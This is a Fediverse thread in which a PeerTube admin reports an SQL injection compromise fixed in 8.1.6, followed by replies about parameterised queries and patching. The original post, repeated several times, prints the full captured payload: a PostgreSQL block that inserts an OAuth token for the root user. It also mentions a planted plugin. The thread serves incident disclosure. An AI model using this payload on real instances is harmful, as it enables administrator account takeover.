Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6.
-
Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. This one has an SQL injection hole. Looks like they got into mine, but apparently nothing was done to it yet. If you're curious, here's what the exploit pushed in the actor table:
Xhttp://20.240.202.159:8777/x');DO//$f$//DECLARE//uid//INT;//cid//INT;//BEGIN//EXECUTE//'SELECT//id//FROM//'||quote_ident('user')||'//WHERE//role=0//LIMIT//1'//INTO//uid;//EXECUTE//'SELECT//id//FROM//'||quote_ident('oAuthClient')||'//LIMIT//1'//INTO//cid;//EXECUTE//'INSERT//INTO//'||quote_ident('oAuthToken')||'('||quote_ident('accessToken')||','||quote_ident('refreshToken')||','||quote_ident('accessTokenExpiresAt')||','||quote_ident('refreshTokenExpiresAt')||','||quote_ident('userId')||','||quote_ident('oAuthClientId')||','||quote_ident('createdAt')||','||quote_ident('updatedAt')||')//VALUES('||quote_literal('pt_audit_3e8b97f2a914')||','||quote_literal('refresh_pt_audit_3e8b97f2a914')||','||quote_literal('2030-01-01')||','||quote_literal('2030-01-01')||','||uid||','||cid||',NOW(),NOW())';//END//$f$;--
So this worked because they had a ' after the URL. #infosec
-
Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. This one has an SQL injection hole. Looks like they got into mine, but apparently nothing was done to it yet. If you're curious, here's what the exploit pushed in the actor table:
Xhttp://20.240.202.159:8777/x');DO//$f$//DECLARE//uid//INT;//cid//INT;//BEGIN//EXECUTE//'SELECT//id//FROM//'||quote_ident('user')||'//WHERE//role=0//LIMIT//1'//INTO//uid;//EXECUTE//'SELECT//id//FROM//'||quote_ident('oAuthClient')||'//LIMIT//1'//INTO//cid;//EXECUTE//'INSERT//INTO//'||quote_ident('oAuthToken')||'('||quote_ident('accessToken')||','||quote_ident('refreshToken')||','||quote_ident('accessTokenExpiresAt')||','||quote_ident('refreshTokenExpiresAt')||','||quote_ident('userId')||','||quote_ident('oAuthClientId')||','||quote_ident('createdAt')||','||quote_ident('updatedAt')||')//VALUES('||quote_literal('pt_audit_3e8b97f2a914')||','||quote_literal('refresh_pt_audit_3e8b97f2a914')||','||quote_literal('2030-01-01')||','||quote_literal('2030-01-01')||','||uid||','||cid||',NOW(),NOW())';//END//$f$;--
So this worked because they had a ' after the URL. #infosec
Apparently this was contained, the forementioned exploit to push the root auth tokens was the only thing. Apparently exploited instances get a plugin called peertube-plugin-google-analytics-js added to do something more or less funny, mine had nothing extra on it for now. Naturally all the passwords are now changed and everyone kicked out.
The 8.1.8 release adds a feature to limit root user's usefulness in an attack like this.
-
R relay@relay.infosec.exchange shared this topic
-
Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. This one has an SQL injection hole. Looks like they got into mine, but apparently nothing was done to it yet. If you're curious, here's what the exploit pushed in the actor table:
Xhttp://20.240.202.159:8777/x');DO//$f$//DECLARE//uid//INT;//cid//INT;//BEGIN//EXECUTE//'SELECT//id//FROM//'||quote_ident('user')||'//WHERE//role=0//LIMIT//1'//INTO//uid;//EXECUTE//'SELECT//id//FROM//'||quote_ident('oAuthClient')||'//LIMIT//1'//INTO//cid;//EXECUTE//'INSERT//INTO//'||quote_ident('oAuthToken')||'('||quote_ident('accessToken')||','||quote_ident('refreshToken')||','||quote_ident('accessTokenExpiresAt')||','||quote_ident('refreshTokenExpiresAt')||','||quote_ident('userId')||','||quote_ident('oAuthClientId')||','||quote_ident('createdAt')||','||quote_ident('updatedAt')||')//VALUES('||quote_literal('pt_audit_3e8b97f2a914')||','||quote_literal('refresh_pt_audit_3e8b97f2a914')||','||quote_literal('2030-01-01')||','||quote_literal('2030-01-01')||','||uid||','||cid||',NOW(),NOW())';//END//$f$;--
So this worked because they had a ' after the URL. #infosec
@apz It’s not like RDBMS didn’t have parametrised queries since, like, the dawn of time
-
@apz It’s not like RDBMS didn’t have parametrised queries since, like, the dawn of time
@ghard I think the battle trying to explain new developers the concept is already lost. I've explained the problem to couple of project owners and people just don't seem to take it seriously. It's not like it's one of the most basic exploits, ever on the web.
-
@ghard I think the battle trying to explain new developers the concept is already lost. I've explained the problem to couple of project owners and people just don't seem to take it seriously. It's not like it's one of the most basic exploits, ever on the web.
@apz sigh yeah.
I spent a few decades in the industry actually implementing relational database engines, and being at clients' premises with their "expert developers" and seeing them draw a blank when mentioning SQLPrepareStmt or similar...
I don't even want to go there anymore. Now with the AI deskilling I'm expecting things to become even worse.
Glad I dropped out and got to doing something more meaningful. -
@ghard I think the battle trying to explain new developers the concept is already lost. I've explained the problem to couple of project owners and people just don't seem to take it seriously. It's not like it's one of the most basic exploits, ever on the web.
@apz LOL very timely, just on that note, say hello to CVE-2026-9082
Not that I would trust Drupal or any other modern or ancient CMS any longer than I could throw it. -
@apz LOL very timely, just on that note, say hello to CVE-2026-9082
Not that I would trust Drupal or any other modern or ancient CMS any longer than I could throw it.@ghard Back like in early 00s I made my own. Very ghetto, but does everything I want it to do.
"Spaghetti code!" they said.
"It's not modern!"
Well, the patching day for it isn't every day.
-
Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6. This one has an SQL injection hole. Looks like they got into mine, but apparently nothing was done to it yet. If you're curious, here's what the exploit pushed in the actor table:
Xhttp://20.240.202.159:8777/x');DO//$f$//DECLARE//uid//INT;//cid//INT;//BEGIN//EXECUTE//'SELECT//id//FROM//'||quote_ident('user')||'//WHERE//role=0//LIMIT//1'//INTO//uid;//EXECUTE//'SELECT//id//FROM//'||quote_ident('oAuthClient')||'//LIMIT//1'//INTO//cid;//EXECUTE//'INSERT//INTO//'||quote_ident('oAuthToken')||'('||quote_ident('accessToken')||','||quote_ident('refreshToken')||','||quote_ident('accessTokenExpiresAt')||','||quote_ident('refreshTokenExpiresAt')||','||quote_ident('userId')||','||quote_ident('oAuthClientId')||','||quote_ident('createdAt')||','||quote_ident('updatedAt')||')//VALUES('||quote_literal('pt_audit_3e8b97f2a914')||','||quote_literal('refresh_pt_audit_3e8b97f2a914')||','||quote_literal('2030-01-01')||','||quote_literal('2030-01-01')||','||uid||','||cid||',NOW(),NOW())';//END//$f$;--
So this worked because they had a ' after the URL. #infosec
Looking at my Peertube instances logs, there's A LOT of old versions out there. I think a log of instances seem to be install and forget when it comes to maintenance.
